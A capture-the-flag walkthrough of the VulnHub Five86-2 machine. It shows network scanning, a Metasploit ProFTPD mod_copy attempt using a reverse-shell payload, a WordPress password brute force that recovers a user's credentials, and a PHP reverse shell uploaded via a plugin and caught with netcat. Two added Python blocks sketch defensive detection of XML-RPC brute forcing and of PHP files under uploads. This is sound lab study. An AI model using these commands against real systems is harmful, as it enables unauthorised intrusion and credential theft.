Fivebox 2
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:e2:ee:06 1 60 PCS Systemtechnik GmbH
192.168.56.199 08:00:27:45:de:88 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.199.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.199 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-22 20:48 EST
Nmap scan report for bogon (192.168.56.199)
Host is up (0.00062s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp ProFTPD 1.3.5e
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Five86-2 – Just another WordPress site
|_http-generator: WordPress 5.1.4
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:45:DE:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.74 seconds
The Nmap scan shows the target host has 2 open ports: 21 (FTP) and 80 (HTTP).
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ ftp 192.168.56.199
Connected to 192.168.56.199.
anonymous
220 ProFTPD 1.3.5e Server (Debian) [::ffff:172.18.0.10]
Name (192.168.56.199:kali): 331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ searchsploit ProFTPd 1.3.5e
Exploits: No Results
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ searchsploit ProFTPd 1.3.5
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
- Anonymous access is not allowed.
- A remote command execution vulnerability (mod_copy) may exist.
Let's see whether the related Metasploit module works:
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www         yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5

View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.56.199
RHOSTS => 192.168.56.199
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[-] 192.168.56.199:80 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/
set payload cmd/unix/bind_awk           set payload cmd/unix/generic
set payload cmd/unix/reverse_perl_ssl   set payload cmd/unix/bind_perl
set payload cmd/unix/reverse_awk        set payload cmd/unix/reverse_python
set payload cmd/unix/bind_perl_ipv6     set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_python_ssl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.56.199   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www         yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/sh          yes       The system shell to use

Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5

View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LhOST 192.168.56.146
LhOST => 192.168.56.146
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 192.168.56.146:5555
[*] 192.168.56.199:80 - 192.168.56.199:21 - Connected to FTP server
[*] 192.168.56.199:80 - 192.168.56.199:21 - Sending copy commands to FTP server
[-] 192.168.56.199:80 - Exploit aborted due to failure: unknown: 192.168.56.199:21 - Failure copying from /proc/self/cmdline
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) >
Browsing to port 80 returns an incomplete page; viewing the page source reveals the hostname, which is added to /etc/hosts:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.199 five86-2
After refreshing the page, the target site turns out to be a WordPress site, so it is enumerated with wpscan:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ wpscan --url http://192.168.56.199 -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.199/ [192.168.56.199]
[+] Started: Wed Feb 22 21:37:01 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.199/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.199/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.199/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.199/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.4 identified (Insecure, released on 2019-12-12).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.199/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.199/, Match: 'WordPress 5.1.4'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] barney
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] peter
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gillian
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] stephen
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 22 21:37:08 2023
[+] Requests Done: 56
[+] Cached Requests: 4
[+] Data Sent: 13.914 KB
[+] Data Received: 147.598 KB
[+] Memory used: 209.285 MB
[+] Elapsed time: 00:00:06
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ wpscan --url http://192.168.56.199 -U barney -P /usr/share/wordlists/rockyou.txt
[+] URL: http://192.168.56.199/ [192.168.56.199]
[+] Started: Wed Feb 22 21:37:44 2023
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - barney / spooky1
Trying barney / slideshows Time: 00:03:18 < > (11615 / 14356007) 0.08% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: barney, Password: spooky1
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 22 21:41:16 2023
[+] Requests Done: 11757
[+] Cached Requests: 28
[+] Data Sent: 5.951 MB
[+] Data Received: 6.859 MB
[+] Memory used: 266.188 MB
[+] Elapsed time: 00:03:31
Logging into the WordPress backend, barney turns out not to be an administrator, so let's see whether admin's password can be cracked.
After running wpscan for about 15 minutes there was still no result, so this was set aside for now.
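The password attack above went through xmlrpc.php, which WordPress answers with HTTP 200 whether or not the credentials are valid, so a defender has to look at request rate rather than status codes. The following detector is an added example for this write-up, not code from the original post; the Apache log lines it parses are constructed, and the 20-requests-per-minute threshold is an assumption to tune per site.

```python
"""Detect XML-RPC password-guessing bursts in Apache combined-format logs.
Added example for this write-up, not from the original post; log lines are
constructed, not captured from the target."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log: client - - [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, method, path) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT),
            m.group("method"), m.group("path"))

def find_xmlrpc_bruteforce(lines, threshold=20, window=timedelta(minutes=1)):
    """Return {ip: total_posts} for clients that POST to /xmlrpc.php more than
    `threshold` times inside any sliding window of length `window`.
    Status codes are ignored on purpose: WordPress answers both good and bad
    XML-RPC logins with HTTP 200, so request rate is the signal."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].endswith("/xmlrpc.php"):
            posts[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide window start forward
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(stamps)
                break
    return flagged

def sample_log():
    """Constructed sample: 25 POSTs in 25 s from one scanner host, plus
    ordinary traffic (one XML-RPC call) from another client."""
    base = datetime.strptime("22/Feb/2023:21:37:44 -0500", TS_FMT)
    lines = []
    for i in range(25):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f'192.168.56.146 - - [{ts}] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "WPScan v3.8.22"')
    ts = base.strftime(TS_FMT)
    lines.append(f'192.168.56.1 - - [{ts}] "GET /wp-content/uploads/ HTTP/1.1" 200 1240 "-" "Mozilla/5.0"')
    lines.append(f'192.168.56.1 - - [{ts}] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"')
    return lines

if __name__ == "__main__":
    for ip, n in find_xmlrpc_bruteforce(sample_log()).items():
        print(f"{ip}: {n} POSTs to xmlrpc.php, brute-force threshold exceeded")
```

Run against a real access log one line at a time; a site that does not need XML-RPC at all can simply deny access to xmlrpc.php and turn the signal into a 403 count.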
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ wpscan --url http://192.168.56.199 --plugins-detection mixed -e p
[+] URL: http://192.168.56.199/ [192.168.56.199]
[+] Started: Wed Feb 22 21:59:11 2023
[+] Enumerating Most Popular Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <============================================> (1500 / 1500) 100.00% Time: 00:00:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.199/wp-content/plugins/akismet/
| Last Updated: 2022-12-01T17:18:00.000Z
| Readme: http://192.168.56.199/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.0.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/akismet/readme.txt
[+] user-role-editor
| Location: http://192.168.56.199/wp-content/plugins/user-role-editor/
| Last Updated: 2022-12-16T06:14:00.000Z
| Readme: http://192.168.56.199/wp-content/plugins/user-role-editor/readme.txt
| [!] The version is out of date, the latest version is 4.63.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/user-role-editor/, status: 200
|
| Version: 4.52.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/user-role-editor/readme.txt
| Confirmed By: Change Log (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/user-role-editor/changelog.txt, Match: '4.52.2'
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 22 21:59:20 2023
[+] Requests Done: 1535
[+] Cached Requests: 8
[+] Data Sent: 419.228 KB
[+] Data Received: 348.217 KB
[+] Memory used: 230.359 MB
[+] Elapsed time: 00:00:09
The scan found no exploitable vulnerability.
Logging in as barney shows that WordPress has the IEAC plugin, which can be used to upload shell.php. As the plugin requires, compress shell.php together with any HTML file, then create a post, choose e-learning in the post, and upload shell1.php. After a successful upload the file is located at:
/wp-content/uploads/articulate_uploads/shell1/shell.php
The reverse shell was successfully caught on Kali Linux:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.199] 47942
Linux five86-2 5.3.0-26-generic #28-Ubuntu SMP Wed Dec 18 05:37:46 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:25:10 up 1:42, 0 users, load average: 0.08, 0.18, 1.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@five86-2:/$ cd /home
cd /home
www-data@five86-2:/home$ ls -alh
ls -alh
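The shell above landed as a .php file under wp-content/uploads, a directory that wpscan had already reported as listable and that should never hold server-side code. The audit below is an added example for this write-up, not the original post's code: it walks an uploads tree and flags PHP by extension or by open tag, and the directory tree it checks is constructed in a temporary directory that mirrors the articulate_uploads/shell1/shell.php path from the write-up.

```python
"""Audit a WordPress uploads tree for server-side code, the defensive
counterpart to the shell.php dropped under articulate_uploads above.
Added example for this write-up, not from the original post; the directory
tree is constructed in a temp dir, nothing is read from the target."""
import os
import tempfile

# Extensions a default Apache mod_php setup hands to the PHP interpreter
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}

def has_php_open_tag(path, head_bytes=4096):
    """True if a PHP open tag appears in the file's first bytes; this catches
    code hidden behind an image extension, which polyglot uploads rely on."""
    try:
        with open(path, "rb") as f:
            head = f.read(head_bytes)
    except OSError:
        return False
    return b"<?php" in head or b"<?=" in head

def find_php_in_uploads(uploads_root):
    """Walk an uploads directory and return relative paths (sorted) of every
    file with a PHP extension or a PHP open tag. Nothing under wp-content/
    uploads should ever need either."""
    findings = []
    for dirpath, _dirs, files in os.walk(uploads_root):
        for name in files:
            full = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_EXTENSIONS or has_php_open_tag(full):
                findings.append(os.path.relpath(full, uploads_root))
    return sorted(findings)

def build_sample_uploads():
    """Constructed fixture mirroring the path from the write-up: one dropped
    .php, one innocent HTML, one clean JPEG and one JPEG carrying a PHP tag."""
    root = tempfile.mkdtemp(prefix="uploads_")
    shell_dir = os.path.join(root, "articulate_uploads", "shell1")
    os.makedirs(shell_dir)
    with open(os.path.join(shell_dir, "shell.php"), "w") as f:
        f.write("<?php /* constructed placeholder, not a real shell */ ?>\n")
    with open(os.path.join(shell_dir, "index.html"), "w") as f:
        f.write("<html><body>course</body></html>\n")
    img_dir = os.path.join(root, "2023", "02")
    os.makedirs(img_dir)
    with open(os.path.join(img_dir, "photo.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff\xe0" + b"\x00" * 64)
    with open(os.path.join(img_dir, "logo.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff\xe0" + b"<?php /* tag after JPEG magic */ ?>")
    return root

if __name__ == "__main__":
    for hit in find_php_in_uploads(build_sample_uploads()):
        print("server-side code under uploads:", hit)
```

Pair the audit with a web-server rule that refuses to execute PHP under wp-content/uploads, so that a dropped file is inert even before the scan runs.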
Privilege escalation
Upload linpeas.sh to the target host and run it:
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
From: https://www.cnblogs.com/jason-huawen/p/17147375.html